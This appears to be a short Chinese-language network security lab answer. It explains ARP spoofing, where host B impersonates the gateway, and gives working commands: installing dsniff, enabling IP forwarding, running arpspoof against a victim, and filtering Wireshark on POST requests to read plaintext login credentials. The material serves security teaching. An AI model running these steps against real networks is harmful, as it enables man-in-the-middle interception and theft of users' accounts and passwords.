为了捕获A到外网的数据,B实施ARP欺骗攻击,B将冒充该子网的什么实体?
主机B冒充的是子网中的网关。
写出 arpspoof 命令格式&B是否能看到A和外网的通信(A刚输入的帐户和口令)&在互联网上找到任意一个以明文方式传递用户帐号、密码的网站,截图Wireshark中显示的明文信息。
1.安装arpspoof:
sudo apt-get install dsniff
2.转发IP
echo 1 > /proc/sys/net/ipv4/ip_forward
3.收集ip地址
(1)ifconfig
(2)nmap
4.欺骗
arpspoof -i eth0 -t 被攻击者ip 网关
然后我们在某网站上登录一次:
接着我们在wireshark上利用http.request.method == POST进行筛选:
这里我们就可以看到该用户登录的账号密码了。